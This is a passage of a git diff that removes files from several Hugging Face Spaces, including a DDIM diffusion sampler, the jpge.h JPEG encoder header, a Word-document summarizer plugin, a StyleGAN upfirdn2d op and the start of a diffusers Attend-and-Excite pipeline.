self.register_buffer('ddim_sigmas_for_original_num_steps', sigmas_for_original_sampling_steps) - - @torch.no_grad() - def sample(self, - S, - batch_size, - shape, - conditioning=None, - callback=None, - normals_sequence=None, - img_callback=None, - quantize_x0=False, - eta=0., - mask=None, - x0=None, - temperature=1., - noise_dropout=0., - score_corrector=None, - corrector_kwargs=None, - verbose=True, - x_T=None, - log_every_t=100, - unconditional_guidance_scale=1., - unconditional_conditioning=None, - features_adapter=None, - append_to_context=None, - cond_tau=0.4, - style_cond_tau=1.0, - # this has to come in the same format as the conditioning, # e.g. as encoded tokens, ... - **kwargs - ): - if conditioning is not None: - if isinstance(conditioning, dict): - cbs = conditioning[list(conditioning.keys())[0]].shape[0] - if cbs != batch_size: - print(f"Warning: Got {cbs} conditionings but batch-size is {batch_size}") - else: - if conditioning.shape[0] != batch_size: - print(f"Warning: Got {conditioning.shape[0]} conditionings but batch-size is {batch_size}") - - self.make_schedule(ddim_num_steps=S, ddim_eta=eta, verbose=verbose) - # sampling - C, H, W = shape - size = (batch_size, C, H, W) - print(f'Data shape for DDIM sampling is {size}, eta {eta}') - - samples, intermediates = self.ddim_sampling(conditioning, size, - callback=callback, - img_callback=img_callback, - quantize_denoised=quantize_x0, - mask=mask, x0=x0, - ddim_use_original_steps=False, - noise_dropout=noise_dropout, - temperature=temperature, - score_corrector=score_corrector, - corrector_kwargs=corrector_kwargs, - x_T=x_T, - log_every_t=log_every_t, - unconditional_guidance_scale=unconditional_guidance_scale, - unconditional_conditioning=unconditional_conditioning, - features_adapter=features_adapter, - append_to_context=append_to_context, - cond_tau=cond_tau, - style_cond_tau=style_cond_tau, - ) - return samples, intermediates - - @torch.no_grad() - def ddim_sampling(self, cond, shape, - x_T=None, ddim_use_original_steps=False, - callback=None, timesteps=None, quantize_denoised=False, - mask=None, x0=None, img_callback=None, log_every_t=100, - temperature=1., noise_dropout=0., score_corrector=None, corrector_kwargs=None, - unconditional_guidance_scale=1., unconditional_conditioning=None, features_adapter=None, - append_to_context=None, cond_tau=0.4, style_cond_tau=1.0): - device = self.model.betas.device - b = shape[0] - if x_T is None: - img = torch.randn(shape, device=device) - else: - img = x_T - - if timesteps is None: - timesteps = self.ddpm_num_timesteps if ddim_use_original_steps else self.ddim_timesteps - elif timesteps is not None and not ddim_use_original_steps: - subset_end = int(min(timesteps / self.ddim_timesteps.shape[0], 1) * self.ddim_timesteps.shape[0]) - 1 - timesteps = self.ddim_timesteps[:subset_end] - - intermediates = {'x_inter': [img], 'pred_x0': [img]} - time_range = reversed(range(0, timesteps)) if ddim_use_original_steps else np.flip(timesteps) - total_steps = timesteps if ddim_use_original_steps else timesteps.shape[0] - print(f"Running DDIM Sampling with {total_steps} timesteps") - - iterator = tqdm(time_range, desc='DDIM Sampler', total=total_steps) - - for i, step in enumerate(iterator): - index = total_steps - i - 1 - ts = torch.full((b,), step, device=device, dtype=torch.long) - - if mask is not None: - assert x0 is not None - img_orig = self.model.q_sample(x0, ts) # TODO: deterministic forward pass? - img = img_orig * mask + (1. - mask) * img - - outs = self.p_sample_ddim(img, cond, ts, index=index, use_original_steps=ddim_use_original_steps, - quantize_denoised=quantize_denoised, temperature=temperature, - noise_dropout=noise_dropout, score_corrector=score_corrector, - corrector_kwargs=corrector_kwargs, - unconditional_guidance_scale=unconditional_guidance_scale, - unconditional_conditioning=unconditional_conditioning, - features_adapter=None if index < int( - (1 - cond_tau) * total_steps) else features_adapter, - append_to_context=None if index < int( - (1 - style_cond_tau) * total_steps) else append_to_context, - ) - img, pred_x0 = outs - if callback: callback(i) - if img_callback: img_callback(pred_x0, i) - - if index % log_every_t == 0 or index == total_steps - 1: - intermediates['x_inter'].append(img) - intermediates['pred_x0'].append(pred_x0) - - return img, intermediates - - @torch.no_grad() - def p_sample_ddim(self, x, c, t, index, repeat_noise=False, use_original_steps=False, quantize_denoised=False, - temperature=1., noise_dropout=0., score_corrector=None, corrector_kwargs=None, - unconditional_guidance_scale=1., unconditional_conditioning=None, features_adapter=None, - append_to_context=None): - b, *_, device = *x.shape, x.device - - if unconditional_conditioning is None or unconditional_guidance_scale == 1.: - if append_to_context is not None: - model_output = self.model.apply_model(x, t, torch.cat([c, append_to_context], dim=1), - features_adapter=features_adapter) - else: - model_output = self.model.apply_model(x, t, c, features_adapter=features_adapter) - else: - x_in = torch.cat([x] * 2) - t_in = torch.cat([t] * 2) - if isinstance(c, dict): - assert isinstance(unconditional_conditioning, dict) - c_in = dict() - for k in c: - if isinstance(c[k], list): - c_in[k] = [torch.cat([ - unconditional_conditioning[k][i], - c[k][i]]) for i in range(len(c[k]))] - else: - c_in[k] = torch.cat([ - unconditional_conditioning[k], - c[k]]) - elif isinstance(c, list): - c_in = list() - assert isinstance(unconditional_conditioning, list) - for i in range(len(c)): - c_in.append(torch.cat([unconditional_conditioning[i], c[i]])) - else: - if append_to_context is not None: - pad_len = append_to_context.size(1) - new_unconditional_conditioning = torch.cat( - [unconditional_conditioning, unconditional_conditioning[:, -pad_len:, :]], dim=1) - new_c = torch.cat([c, append_to_context], dim=1) - c_in = torch.cat([new_unconditional_conditioning, new_c]) - else: - c_in = torch.cat([unconditional_conditioning, c]) - model_uncond, model_t = self.model.apply_model(x_in, t_in, c_in, features_adapter=features_adapter).chunk(2) - model_output = model_uncond + unconditional_guidance_scale * (model_t - model_uncond) - - if self.model.parameterization == "v": - e_t = self.model.predict_eps_from_z_and_v(x, t, model_output) - else: - e_t = model_output - - if score_corrector is not None: - assert self.model.parameterization == "eps", 'not implemented' - e_t = score_corrector.modify_score(self.model, e_t, x, t, c, **corrector_kwargs) - - alphas = self.model.alphas_cumprod if use_original_steps else self.ddim_alphas - alphas_prev = self.model.alphas_cumprod_prev if use_original_steps else self.ddim_alphas_prev - sqrt_one_minus_alphas = self.model.sqrt_one_minus_alphas_cumprod if use_original_steps else self.ddim_sqrt_one_minus_alphas - sigmas = self.model.ddim_sigmas_for_original_num_steps if use_original_steps else self.ddim_sigmas - # select parameters corresponding to the currently considered timestep - a_t = torch.full((b, 1, 1, 1), alphas[index], device=device) - a_prev = torch.full((b, 1, 1, 1), alphas_prev[index], device=device) - sigma_t = torch.full((b, 1, 1, 1), sigmas[index], device=device) - sqrt_one_minus_at = torch.full((b, 1, 1, 1), sqrt_one_minus_alphas[index], device=device) - - # current prediction for x_0 - if self.model.parameterization != "v": - pred_x0 = (x - sqrt_one_minus_at * e_t) / a_t.sqrt() - else: - pred_x0 = self.model.predict_start_from_z_and_v(x, t, model_output) - - if quantize_denoised: - pred_x0, _, *_ = self.model.first_stage_model.quantize(pred_x0) - # direction pointing to x_t - dir_xt = (1. - a_prev - sigma_t ** 2).sqrt() * e_t - noise = sigma_t * noise_like(x.shape, device, repeat_noise) * temperature - if noise_dropout > 0.: - noise = torch.nn.functional.dropout(noise, p=noise_dropout) - x_prev = a_prev.sqrt() * pred_x0 + dir_xt + noise - return x_prev, pred_x0 - - @torch.no_grad() - def stochastic_encode(self, x0, t, use_original_steps=False, noise=None): - # fast, but does not allow for exact reconstruction - # t serves as an index to gather the correct alphas - if use_original_steps: - sqrt_alphas_cumprod = self.sqrt_alphas_cumprod - sqrt_one_minus_alphas_cumprod = self.sqrt_one_minus_alphas_cumprod - else: - sqrt_alphas_cumprod = torch.sqrt(self.ddim_alphas) - sqrt_one_minus_alphas_cumprod = self.ddim_sqrt_one_minus_alphas - - if noise is None: - noise = torch.randn_like(x0) - return (extract_into_tensor(sqrt_alphas_cumprod, t, x0.shape) * x0 + - extract_into_tensor(sqrt_one_minus_alphas_cumprod, t, x0.shape) * noise) - - @torch.no_grad() - def decode(self, x_latent, cond, t_start, unconditional_guidance_scale=1.0, unconditional_conditioning=None, - use_original_steps=False): - - timesteps = np.arange(self.ddpm_num_timesteps) if use_original_steps else self.ddim_timesteps - timesteps = timesteps[:t_start] - - time_range = np.flip(timesteps) - total_steps = timesteps.shape[0] - print(f"Running DDIM Sampling with {total_steps} timesteps") - - iterator = tqdm(time_range, desc='Decoding image', total=total_steps) - x_dec = x_latent - for i, step in enumerate(iterator): - index = total_steps - i - 1 - ts = torch.full((x_latent.shape[0],), step, device=x_latent.device, dtype=torch.long) - x_dec, _ = self.p_sample_ddim(x_dec, cond, ts, index=index, use_original_steps=use_original_steps, - unconditional_guidance_scale=unconditional_guidance_scale, - unconditional_conditioning=unconditional_conditioning) - return x_dec diff --git a/spaces/AdithyaSNair/Dog_breed_predictor/README.md b/spaces/AdithyaSNair/Dog_breed_predictor/README.md deleted file mode 100644 index 96a9afb4a20da7e5e1d2495240e3209336a4336d..0000000000000000000000000000000000000000 --- a/spaces/AdithyaSNair/Dog_breed_predictor/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Dog Breed Predictor -emoji: 🏆 -colorFrom: indigo -colorTo: green -sdk: streamlit -sdk_version: 1.26.0 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/plugins/touchcursor-plugin.js b/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/plugins/touchcursor-plugin.js deleted file mode 100644 index 0aba4335bee173e28c40e7fca4b14ea8529f3ac5..0000000000000000000000000000000000000000 --- a/spaces/AgentVerse/agentVerse/ui/src/phaser3-rex-plugins/plugins/touchcursor-plugin.js +++ /dev/null @@ -1,20 +0,0 @@ -import TouchCursor from './touchcursor.js'; - -class TouchCursorPlugin extends Phaser.Plugins.BasePlugin { - - constructor(pluginManager) { - super(pluginManager); - } - - start() { - var eventEmitter = this.game.events; - eventEmitter.on('destroy', this.destroy, this); - } - - add(gameObject, config) { - return new TouchCursor(gameObject, config); - } - -} - -export default TouchCursorPlugin; \ No newline at end of file diff --git a/spaces/Alesteba/NeRF_ficus-pxl/config.py b/spaces/Alesteba/NeRF_ficus-pxl/config.py deleted file mode 100644 index 9f062ebe3532b740155f5f86b93659dcec49d565..0000000000000000000000000000000000000000 --- a/spaces/Alesteba/NeRF_ficus-pxl/config.py +++ /dev/null @@ -1,16 +0,0 @@ -import streamlit as st -import tensorflow as tf -import numpy as np - -# Setting random seed to obtain reproducible results. -tf.random.set_seed(42) - -# Initialize global variables. -AUTO = tf.data.AUTOTUNE -BATCH_SIZE = 1 -NUM_SAMPLES = 32 -POS_ENCODE_DIMS = 16 -EPOCHS = 30 -H = 50 -W = 50 -focal = 0.6911112070083618 \ No newline at end of file diff --git a/spaces/Amon1/ChatGPTForAcadamic/crazy_functions/test_project/cpp/libJPG/jpge.h b/spaces/Amon1/ChatGPTForAcadamic/crazy_functions/test_project/cpp/libJPG/jpge.h deleted file mode 100644 index a46c805ab80aab491f7f9508b3a008b149866bee..0000000000000000000000000000000000000000 --- a/spaces/Amon1/ChatGPTForAcadamic/crazy_functions/test_project/cpp/libJPG/jpge.h +++ /dev/null @@ -1,172 +0,0 @@ - -// jpge.h - C++ class for JPEG compression. -// Public domain, Rich Geldreich -// Alex Evans: Added RGBA support, linear memory allocator. -#ifndef JPEG_ENCODER_H -#define JPEG_ENCODER_H - -#include - -namespace jpge -{ - typedef unsigned char uint8; - typedef signed short int16; - typedef signed int int32; - typedef unsigned short uint16; - typedef unsigned int uint32; - typedef unsigned int uint; - - // JPEG chroma subsampling factors. Y_ONLY (grayscale images) and H2V2 (color images) are the most common. - enum subsampling_t { Y_ONLY = 0, H1V1 = 1, H2V1 = 2, H2V2 = 3 }; - - // JPEG compression parameters structure. - struct params - { - inline params() : m_quality(85), m_subsampling(H2V2), m_no_chroma_discrim_flag(false), m_two_pass_flag(false) { } - - inline bool check_valid() const - { - if ((m_quality < 1) || (m_quality > 100)) return false; - if ((uint)m_subsampling > (uint)H2V2) return false; - return true; - } - - // Quality: 1-100, higher is better. Typical values are around 50-95. - int m_quality; - - // m_subsampling: - // 0 = Y (grayscale) only - // 1 = YCbCr, no subsampling (H1V1, YCbCr 1x1x1, 3 blocks per MCU) - // 2 = YCbCr, H2V1 subsampling (YCbCr 2x1x1, 4 blocks per MCU) - // 3 = YCbCr, H2V2 subsampling (YCbCr 4x1x1, 6 blocks per MCU-- very common) - subsampling_t m_subsampling; - - // Disables CbCr discrimination - only intended for testing. - // If true, the Y quantization table is also used for the CbCr channels. - bool m_no_chroma_discrim_flag; - - bool m_two_pass_flag; - }; - - // Writes JPEG image to a file. - // num_channels must be 1 (Y) or 3 (RGB), image pitch must be width*num_channels. - bool compress_image_to_jpeg_file(const char *pFilename, int64_t width, int64_t height, int64_t num_channels, const uint8 *pImage_data, const params &comp_params = params()); - - // Writes JPEG image to memory buffer. - // On entry, buf_size is the size of the output buffer pointed at by pBuf, which should be at least ~1024 bytes. - // If return value is true, buf_size will be set to the size of the compressed data. - bool compress_image_to_jpeg_file_in_memory(void *pBuf, int64_t &buf_size, int64_t width, int64_t height, int64_t num_channels, const uint8 *pImage_data, const params &comp_params = params()); - - // Output stream abstract class - used by the jpeg_encoder class to write to the output stream. - // put_buf() is generally called with len==JPGE_OUT_BUF_SIZE bytes, but for headers it'll be called with smaller amounts. - class output_stream - { - public: - virtual ~output_stream() { }; - virtual bool put_buf(const void* Pbuf, int64_t len) = 0; - template inline bool put_obj(const T& obj) { return put_buf(&obj, sizeof(T)); } - }; - - // Lower level jpeg_encoder class - useful if more control is needed than the above helper functions. - class jpeg_encoder - { - public: - jpeg_encoder(); - ~jpeg_encoder(); - - // Initializes the compressor. - // pStream: The stream object to use for writing compressed data. - // params - Compression parameters structure, defined above. - // width, height - Image dimensions. - // channels - May be 1, or 3. 1 indicates grayscale, 3 indicates RGB source data. - // Returns false on out of memory or if a stream write fails. - bool init(output_stream *pStream, int64_t width, int64_t height, int64_t src_channels, const params &comp_params = params()); - - const params &get_params() const { return m_params; } - - // Deinitializes the compressor, freeing any allocated memory. May be called at any time. - void deinit(); - - uint get_total_passes() const { return m_params.m_two_pass_flag ? 2 : 1; } - inline uint get_cur_pass() { return m_pass_num; } - - // Call this method with each source scanline. - // width * src_channels bytes per scanline is expected (RGB or Y format). - // You must call with NULL after all scanlines are processed to finish compression. - // Returns false on out of memory or if a stream write fails. - bool process_scanline(const void* pScanline); - - private: - jpeg_encoder(const jpeg_encoder &); - jpeg_encoder &operator =(const jpeg_encoder &); - - typedef int32 sample_array_t; - - output_stream *m_pStream; - params m_params; - uint8 m_num_components; - uint8 m_comp_h_samp[3], m_comp_v_samp[3]; - int m_image_x, m_image_y, m_image_bpp, m_image_bpl; - int m_image_x_mcu, m_image_y_mcu; - int m_image_bpl_xlt, m_image_bpl_mcu; - int m_mcus_per_row; - int m_mcu_x, m_mcu_y; - uint8 *m_mcu_lines[16]; - uint8 m_mcu_y_ofs; - sample_array_t m_sample_array[64]; - int16 m_coefficient_array[64]; - int32 m_quantization_tables[2][64]; - uint m_huff_codes[4][256]; - uint8 m_huff_code_sizes[4][256]; - uint8 m_huff_bits[4][17]; - uint8 m_huff_val[4][256]; - uint32 m_huff_count[4][256]; - int m_last_dc_val[3]; - enum { JPGE_OUT_BUF_SIZE = 2048 }; - uint8 m_out_buf[JPGE_OUT_BUF_SIZE]; - uint8 *m_pOut_buf; - uint m_out_buf_left; - uint32 m_bit_buffer; - uint m_bits_in; - uint8 m_pass_num; - bool m_all_stream_writes_succeeded; - - void optimize_huffman_table(int table_num, int table_len); - void emit_byte(uint8 i); - void emit_word(uint i); - void emit_marker(int marker); - void emit_jfif_app0(); - void emit_dqt(); - void emit_sof(); - void emit_dht(uint8 *bits, uint8 *val, int index, bool ac_flag); - void emit_dhts(); - void emit_sos(); - void emit_markers(); - void compute_huffman_table(uint *codes, uint8 *code_sizes, uint8 *bits, uint8 *val); - void compute_quant_table(int32 *dst, int16 *src); - void adjust_quant_table(int32 *dst, int32 *src); - void first_pass_init(); - bool second_pass_init(); - bool jpg_open(int p_x_res, int p_y_res, int src_channels); - void load_block_8_8_grey(int x); - void load_block_8_8(int x, int y, int c); - void load_block_16_8(int x, int c); - void load_block_16_8_8(int x, int c); - void load_quantized_coefficients(int component_num); - void flush_output_buffer(); - void put_bits(uint bits, uint len); - void code_coefficients_pass_one(int component_num); - void code_coefficients_pass_two(int component_num); - void code_block(int component_num); - void process_mcu_row(); - bool terminate_pass_one(); - bool terminate_pass_two(); - bool process_end_of_image(); - void load_mcu(const void* src); - void clear(); - void init(); - }; - -} // namespace jpge - -#endif // JPEG_ENCODER \ No newline at end of file diff --git "a/spaces/Amon1/ChatGPTForAcadamic/crazy_functions/\346\200\273\347\273\223word\346\226\207\346\241\243.py" "b/spaces/Amon1/ChatGPTForAcadamic/crazy_functions/\346\200\273\347\273\223word\346\226\207\346\241\243.py" deleted file mode 100644 index a117fb3c0668457b30e63373c6ab8d85281ee044..0000000000000000000000000000000000000000 --- "a/spaces/Amon1/ChatGPTForAcadamic/crazy_functions/\346\200\273\347\273\223word\346\226\207\346\241\243.py" +++ /dev/null @@ -1,127 +0,0 @@ -from predict import predict_no_ui -from toolbox import CatchException, report_execption, write_results_to_file, predict_no_ui_but_counting_down -fast_debug = False - - -def 解析docx(file_manifest, project_folder, top_p, temperature, chatbot, history, systemPromptTxt): - import time, os - # pip install python-docx 用于docx格式,跨平台 - # pip install pywin32 用于doc格式,仅支持Win平台 - - print('begin analysis on:', file_manifest) - for index, fp in enumerate(file_manifest): - if fp.split(".")[-1] == "docx": - from docx import Document - doc = Document(fp) - file_content = "\n".join([para.text for para in doc.paragraphs]) - else: - import win32com.client - word = win32com.client.Dispatch("Word.Application") - word.visible = False - # 打开文件 - print('fp', os.getcwd()) - doc = word.Documents.Open(os.getcwd() + '/' + fp) - # file_content = doc.Content.Text - doc = word.ActiveDocument - file_content = doc.Range().Text - doc.Close() - word.Quit() - - print(file_content) - - prefix = "接下来请你逐文件分析下面的论文文件," if index == 0 else "" - # private_upload里面的文件名在解压zip后容易出现乱码(rar和7z格式正常),故可以只分析文章内容,不输入文件名 - i_say = prefix + f'请对下面的文章片段用中英文做概述,文件名是{os.path.relpath(fp, project_folder)},' \ - f'文章内容是 ```{file_content}```' - i_say_show_user = prefix + f'[{index+1}/{len(file_manifest)}] 假设你是论文审稿专家,请对下面的文章片段做概述: {os.path.abspath(fp)}' - chatbot.append((i_say_show_user, "[Local Message] waiting gpt response.")) - yield chatbot, history, '正常' - - if not fast_debug: - msg = '正常' - # ** gpt request ** - gpt_say = yield from predict_no_ui_but_counting_down(i_say, i_say_show_user, chatbot, top_p, temperature, - history=[]) # 带超时倒计时 - chatbot[-1] = (i_say_show_user, gpt_say) - history.append(i_say_show_user); - history.append(gpt_say) - yield chatbot, history, msg - if not fast_debug: time.sleep(2) - - """ - # 可按需启用 - i_say = f'根据你上述的分析,对全文进行概括,用学术性语言写一段中文摘要,然后再写一篇英文的。' - chatbot.append((i_say, "[Local Message] waiting gpt response.")) - yield chatbot, history, '正常' - - - i_say = f'我想让你做一个论文写作导师。您的任务是使用人工智能工具(例如自然语言处理)提供有关如何改进其上述文章的反馈。' \ - f'您还应该利用您在有效写作技巧方面的修辞知识和经验来建议作者可以更好地以书面形式表达他们的想法和想法的方法。' \ - f'根据你之前的分析,提出建议' - chatbot.append((i_say, "[Local Message] waiting gpt response.")) - yield chatbot, history, '正常' - - """ - - if not fast_debug: - msg = '正常' - # ** gpt request ** - gpt_say = yield from predict_no_ui_but_counting_down(i_say, i_say, chatbot, top_p, temperature, - history=history) # 带超时倒计时 - - chatbot[-1] = (i_say, gpt_say) - history.append(i_say) - history.append(gpt_say) - yield chatbot, history, msg - res = write_results_to_file(history) - chatbot.append(("完成了吗?", res)) - yield chatbot, history, msg - - -@CatchException -def 总结word文档(txt, top_p, temperature, chatbot, history, systemPromptTxt, WEB_PORT): - import glob, os - - # 基本信息:功能、贡献者 - chatbot.append([ - "函数插件功能?", - "批量总结Word文档。函数插件贡献者: JasonGuo1"]) - yield chatbot, history, '正常' - - # 尝试导入依赖,如果缺少依赖,则给出安装建议 - try: - from docx import Document - except: - report_execption(chatbot, history, - a=f"解析项目: {txt}", - b=f"导入软件依赖失败。使用该模块需要额外依赖,安装方法```pip install --upgrade python-docx pywin32```。") - yield chatbot, history, '正常' - return - - # 清空历史,以免输入溢出 - history = [] - - # 检测输入参数,如没有给定输入参数,直接退出 - if os.path.exists(txt): - project_folder = txt - else: - if txt == "": txt = '空空如也的输入栏' - report_execption(chatbot, history, a=f"解析项目: {txt}", b=f"找不到本地项目或无权访问: {txt}") - yield chatbot, history, '正常' - return - - # 搜索需要处理的文件清单 - file_manifest = [f for f in glob.glob(f'{project_folder}/**/*.docx', recursive=True)] + \ - [f for f in glob.glob(f'{project_folder}/**/*.doc', recursive=True)] - # [f for f in glob.glob(f'{project_folder}/**/*.tex', recursive=True)] + \ - # [f for f in glob.glob(f'{project_folder}/**/*.cpp', recursive=True)] + \ - # [f for f in glob.glob(f'{project_folder}/**/*.c', recursive=True)] - - # 如果没找到任何文件 - if len(file_manifest) == 0: - report_execption(chatbot, history, a=f"解析项目: {txt}", b=f"找不到任何.docx或doc文件: {txt}") - yield chatbot, history, '正常' - return - - # 开始正式执行任务 - yield from 解析docx(file_manifest, project_folder, top_p, temperature, chatbot, history, systemPromptTxt) diff --git a/spaces/Amrrs/DragGan-Inversion/stylegan_human/pti/pti_models/e4e/stylegan2/op/upfirdn2d.py b/spaces/Amrrs/DragGan-Inversion/stylegan_human/pti/pti_models/e4e/stylegan2/op/upfirdn2d.py deleted file mode 100644 index 6727f2bf0857c1f4e0d50de363de75e7b8d4de50..0000000000000000000000000000000000000000 --- a/spaces/Amrrs/DragGan-Inversion/stylegan_human/pti/pti_models/e4e/stylegan2/op/upfirdn2d.py +++ /dev/null @@ -1,60 +0,0 @@ -import os - -import torch -from torch.nn import functional as F - - -module_path = os.path.dirname(__file__) - - -def upfirdn2d(input, kernel, up=1, down=1, pad=(0, 0)): - out = upfirdn2d_native( - input, kernel, up, up, down, down, pad[0], pad[1], pad[0], pad[1] - ) - - return out - - -def upfirdn2d_native( - input, kernel, up_x, up_y, down_x, down_y, pad_x0, pad_x1, pad_y0, pad_y1 -): - _, channel, in_h, in_w = input.shape - input = input.reshape(-1, in_h, in_w, 1) - - _, in_h, in_w, minor = input.shape - kernel_h, kernel_w = kernel.shape - - out = input.view(-1, in_h, 1, in_w, 1, minor) - out = F.pad(out, [0, 0, 0, up_x - 1, 0, 0, 0, up_y - 1]) - out = out.view(-1, in_h * up_y, in_w * up_x, minor) - - out = F.pad( - out, [0, 0, max(pad_x0, 0), max(pad_x1, 0), - max(pad_y0, 0), max(pad_y1, 0)] - ) - out = out[ - :, - max(-pad_y0, 0): out.shape[1] - max(-pad_y1, 0), - max(-pad_x0, 0): out.shape[2] - max(-pad_x1, 0), - :, - ] - - out = out.permute(0, 3, 1, 2) - out = out.reshape( - [-1, 1, in_h * up_y + pad_y0 + pad_y1, in_w * up_x + pad_x0 + pad_x1] - ) - w = torch.flip(kernel, [0, 1]).view(1, 1, kernel_h, kernel_w) - out = F.conv2d(out, w) - out = out.reshape( - -1, - minor, - in_h * up_y + pad_y0 + pad_y1 - kernel_h + 1, - in_w * up_x + pad_x0 + pad_x1 - kernel_w + 1, - ) - out = out.permute(0, 2, 3, 1) - out = out[:, ::down_y, ::down_x, :] - - out_h = (in_h * up_y + pad_y0 + pad_y1 - kernel_h) // down_y + 1 - out_w = (in_w * up_x + pad_x0 + pad_x1 - kernel_w) // down_x + 1 - - return out.view(-1, channel, out_h, out_w) diff --git a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/src/diffusers/pipelines/stable_diffusion/pipeline_stable_diffusion_attend_and_excite.py b/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/src/diffusers/pipelines/stable_diffusion/pipeline_stable_diffusion_attend_and_excite.py deleted file mode 100644 index a95015a2b850dcbd1f69b68856cdb2d79e40d767..0000000000000000000000000000000000000000 --- a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/src/diffusers/pipelines/stable_diffusion/pipeline_stable_diffusion_attend_and_excite.py +++ /dev/null @@ -1,1020 +0,0 @@ -# Copyright 2023 The HuggingFace Team. All rights reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -import inspect -import math -import warnings -from typing import Any, Callable, Dict, List, Optional, Tuple, Union - -import numpy as np -import torch -from torch.nn import functional as F -from transformers import CLIPImageProcessor, CLIPTextModel, CLIPTokenizer - -from ...image_processor import VaeImageProcessor -from ...loaders import LoraLoaderMixin, TextualInversionLoaderMixin -from ...models import AutoencoderKL, UNet2DConditionModel -from ...models.attention_processor import Attention -from ...schedulers import KarrasDiffusionSchedulers -from ...utils import logging, randn_tensor, replace_example_docstring -from ..pipeline_utils import DiffusionPipeline -from . import StableDiffusionPipelineOutput -from .safety_checker import StableDiffusionSafetyChecker - - -logger = logging.get_logger(__name__) - -EXAMPLE_DOC_STRING = """ - Examples: - ```py - >>> import torch - >>> from diffusers import StableDiffusionAttendAndExcitePipeline - - >>> pipe = StableDiffusionAttendAndExcitePipeline.from_pretrained( - ... "CompVis/stable-diffusion-v1-4", torch_dtype=torch.float16 - ... ).to("cuda") - - - >>> prompt = "a cat and a frog" - - >>> # use get_indices function to find out indices of the tokens you want to alter - >>> pipe.get_indices(prompt) - {0: '<|startoftext|>', 1: 'a', 2: 'cat', 3: 'and', 4: 'a', 5: 'frog', 6: '<|endoftext|>'} - - >>> token_indices = [2, 5] - >>> seed = 6141 - >>> generator = torch.Generator("cuda").manual_seed(seed) - - >>> images = pipe( - ... prompt=prompt, - ... token_indices=token_indices, - ... guidance_scale=7.5, - ... generator=generator, - ... num_inference_steps=50, - ... max_iter_to_alter=25, - ... ).images - - >>> image = images[0] - >>> image.save(f"../images/{prompt}_{seed}.png") - ``` -""" - - -class AttentionStore: - @staticmethod - def get_empty_store(): - return {"down": [], "mid": [], "up": []} - - def __call__(self, attn, is_cross: bool, place_in_unet: str): - if self.cur_att_layer >= 0 and is_cross: - if attn.shape[1] == np.prod(self.attn_res): - self.step_store[place_in_unet].append(attn) - - self.cur_att_layer += 1 - if self.cur_att_layer == self.num_att_layers: - self.cur_att_layer = 0 - self.between_steps() - - def between_steps(self): - self.attention_store = self.step_store - self.step_store = self.get_empty_store() - - def get_average_attention(self): - average_attention = self.attention_store - return average_attention - - def aggregate_attention(self, from_where: List[str]) -> torch.Tensor: - """Aggregates the attention across the different layers and heads at the specified resolution.""" - out = [] - attention_maps = self.get_average_attention() - for location in from_where: - for item in attention_maps[location]: - cross_maps = item.reshape(-1, self.attn_res[0], self.attn_res[1], item.shape[-1]) - out.append(cross_maps) - out = torch.cat(out, dim=0) - out = out.sum(0) / out.shape[0] - return out - - def reset(self): - self.cur_att_layer = 0 - self.step_store = self.get_empty_store() - self.attention_store = {} - - def __init__(self, attn_res): - """ - Initialize an empty AttentionStore :param step_index: used to visualize only a specific step in the diffusion - process - """ - self.num_att_layers = -1 - self.cur_att_layer = 0 - self.step_store = self.get_empty_store() - self.attention_store = {} - self.curr_step_index = 0 - self.attn_res = attn_res - - -class AttendExciteAttnProcessor: - def __init__(self, attnstore, place_in_unet): - super().__init__() - self.attnstore = attnstore - self.place_in_unet = place_in_unet - - def __call__(self, attn: Attention, hidden_states, encoder_hidden_states=None, attention_mask=None): - batch_size, sequence_length, _ = hidden_states.shape - attention_mask = attn.prepare_attention_mask(attention_mask, sequence_length, batch_size) - - query = attn.to_q(hidden_states) - - is_cross = encoder_hidden_states is not None - encoder_hidden_states = encoder_hidden_states if encoder_hidden_states is not None else hidden_states - key = attn.to_k(encoder_hidden_states) - value = attn.to_v(encoder_hidden_states) - - query = attn.head_to_batch_dim(query) - key = attn.head_to_batch_dim(key) - value = attn.head_to_batch_dim(value) - - attention_probs = attn.get_attention_scores(query, key, attention_mask) - - # only need to store attention maps during the Attend and Excite process - if attention_probs.requires_grad: - self.attnstore(attention_probs, is_cross, self.place_in_unet) - - hidden_states = torch.bmm(attention_probs, value) - hidden_states = attn.batch_to_head_dim(hidden_states) - - # linear proj - hidden_states = attn.to_out[0](hidden_states) - # dropout - hidden_states = attn.to_out[1](hidden_states) - - return hidden_states - - -class StableDiffusionAttendAndExcitePipeline(DiffusionPipeline, TextualInversionLoaderMixin): - r""" - Pipeline for text-to-image generation using Stable Diffusion and Attend-and-Excite. - - This model inherits from [`DiffusionPipeline`]. Check the superclass documentation for the generic methods - implemented for all pipelines (downloading, saving, running on a particular device, etc.). - - Args: - vae ([`AutoencoderKL`]): - Variational Auto-Encoder (VAE) model to encode and decode images to and from latent representations. - text_encoder ([`~transformers.CLIPTextModel`]): - Frozen text-encoder ([clip-vit-large-patch14](https://huggingface.co/openai/clip-vit-large-patch14)). - tokenizer ([`~transformers.CLIPTokenizer`]): - A `CLIPTokenizer` to tokenize text. - unet ([`UNet2DConditionModel`]): - A `UNet2DConditionModel` to denoise the encoded image latents. - scheduler ([`SchedulerMixin`]): - A scheduler to be used in combination with `unet` to denoise the encoded image latents. Can be one of - [`DDIMScheduler`], [`LMSDiscreteScheduler`], or [`PNDMScheduler`]. - safety_checker ([`StableDiffusionSafetyChecker`]): - Classification module that estimates whether generated images could be considered offensive or harmful. - Please refer to the [model card](https://huggingface.co/runwayml/stable-diffusion-v1-5) for more details - about a model's potential harms. - feature_extractor ([`~transformers.CLIPImageProcessor`]): - A `CLIPImageProcessor` to extract features from generated images; used as inputs to the `safety_checker`. - """ - _optional_components = ["safety_checker", 